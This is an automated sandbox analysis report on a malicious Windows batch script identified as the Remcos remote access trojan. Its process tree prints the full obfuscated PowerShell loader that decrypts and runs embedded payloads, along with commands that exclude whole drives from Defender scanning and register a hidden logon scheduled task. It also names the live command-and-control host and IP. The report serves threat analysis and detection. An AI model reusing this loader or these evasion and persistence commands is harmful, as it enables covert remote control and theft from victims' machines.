Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UrgenteNotificationRef.cmd

Overview

General Information

Sample name:UrgenteNotificationRef.cmd
Analysis ID:1431053
MD5:f01b6515e2ba3feb16fd0aee360dd548
SHA1:b4b9e3ced7f77f3f0ec4434c22ac17c8e0449a4d
SHA256:0aa7625b469a7a8d9ab9f6fdd8a17050f7774aaeced7ba3e4d93fbb4c63e2bd7
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Sigma detected: Remcos
Yara detected Remcos RAT
Adds a directory exclusion to Windows Defender
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7336 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\UrgenteNotificationRef.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7388 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\UrgenteNotificationRef.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7440 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\UrgenteNotificationRef.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7448 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 7548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 7680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\') MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7884 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\UrgenteNotificationRef') MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7404 cmdline: "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Network28681Man.cmd" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7496 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Network28681Man.cmd" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7604 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network28681Man.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • powershell.exe (PID: 7612 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • powershell.exe (PID: 7732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • powershell.exe (PID: 5800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\') MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 4476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network28681Man') MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 928 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 928 cmdline: C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\Network28681Man.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\brotha\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\'), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\'), CommandLine|base64offset|contains: i~kyzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7448, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\'), ProcessId: 7680, ProcessName: powershell.exe
    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7448, TargetFilename: C:\Users\user\AppData\Roaming\Network28681Man.cmd
    Sigma detected: Powershell Defender Exclusion
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\'), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\'), CommandLine|base64offset|contains: i~kyzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7448, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\'), ProcessId: 7680, ProcessName: powershell.exe
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\UrgenteNotificationRef.cmd" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7388, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7448, ProcessName: powershell.exe

    Stealing of Sensitive Information

    barindex
    Sigma detected: Remcos
    Source: Registry Key setAuthor: Joe Security: Data: Details: 72 6B 53 A3 8B BA 7E 6E D1 46 BB B0 10 E8 6A 65 86 6A 5C FF A6 98 FB 81 56 2E 2B C4 F6 DC 0C C0 0A F4 D4 C9 63 EA 87 00 62 C5 90 7E 84 B8 C4 AC DE 36 7F 0B 2B C5 71 DC 32 8C 4C DB 4F A4 47 20 97 7C CE E0 A4 E8 D7 5A 31 D6 94 A6 88 D7 BD A4 A0 98 36 8D 26 CC DE 90 B7 B9 0B 33 23 A9 D1 53 2F 84 B4 BB 2B DF 55 C5 14 36 4F 0C B0 12 2B 5C 3E FF D8 A7 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7612, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-K9847Q\exepath

    Snort Signatures

    No Snort rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
    Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
    Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
    Yara detected Remcos RAT
    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\brotha\logs.dat, type: DROPPED

    Networking

    barindex
    Uses dynamic DNS services
    Source: unknownDNS query: name: embargogo237.duckdns.org
    Source: global trafficTCP traffic: 192.168.2.4:49737 -> 45.74.19.121:10521
    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
    Source: Joe Sandbox ViewIP Address: 45.74.19.121 45.74.19.121
    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
    Source: Joe Sandbox ViewASN Name: HVC-ASUS HVC-ASUS
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
    Source: global trafficDNS traffic detected: DNS query: embargogo237.duckdns.org
    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
    Source: powershell.exe, 0000000C.00000002.1857143467.0000000007CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
    Source: powershell.exe, 00000017.00000002.1893864511.0000000006FC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft0
    Source: powershell.exe, 00000007.00000002.1710436376.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1765702553.0000000005A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1839873781.000000000556E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 0000000C.00000002.1825292388.0000000004643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000007.00000002.1704963199.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1754696525.0000000004B14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1825292388.0000000004643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1925326685.0000000004B95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2027065899.0000000004E95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2113103855.0000000004A93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000006.00000002.1670797373.0000000005502000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1704963199.0000000004551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1754696525.00000000049C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1825292388.0000000004501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1882584365.0000000004965000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1925326685.0000000004A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2027065899.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2113103855.0000000004961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000007.00000002.1704963199.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1754696525.0000000004B14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1825292388.0000000004643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1925326685.0000000004B95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2027065899.0000000004E95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2113103855.0000000004A93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 0000000C.00000002.1825292388.0000000004643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000006.00000002.1670797373.00000000054C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1670797373.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1704963199.0000000004551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1754696525.00000000049C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1825292388.0000000004501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1882584365.0000000004937000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1882584365.0000000004949000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1925326685.0000000004A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2027065899.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2113103855.0000000004961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
    Source: powershell.exe, 0000001E.00000002.2113103855.0000000004A93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2105453899.0000000000A88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
    Source: powershell.exe, 0000000C.00000002.1839873781.000000000556E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 0000000C.00000002.1839873781.000000000556E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 0000000C.00000002.1839873781.000000000556E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 0000000C.00000002.1825292388.0000000004643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000007.00000002.1710436376.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1765702553.0000000005A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1839873781.000000000556E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Installs a global keyboard hook
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

    E-Banking Fraud

    barindex
    Yara detected Remcos RAT
    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\brotha\logs.dat, type: DROPPED

    System Summary

    barindex
    Very long command line found
    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2186
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2187
    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2186Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2187
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0447B4A07_2_0447B4A0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0447B4907_2_0447B490
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0447B49B7_2_0447B49B
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00F3B1B810_2_00F3B1B8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00F3B0D710_2_00F3B0D7
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00F394D010_2_00F394D0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_07601F7C10_2_07601F7C
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00E1C53812_2_00E1C538
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00E1C53712_2_00E1C537
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0819407A12_2_0819407A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_04C7B03028_2_04C7B030
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_04C7B02028_2_04C7B020
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_04C7AF9728_2_04C7AF97
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_087E1D6828_2_087E1D68
    Source: classification engineClassification label: mal100.troj.spyw.evad.winCMD@43/40@2/2
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\bGXRavBzfI
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-K9847Q
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
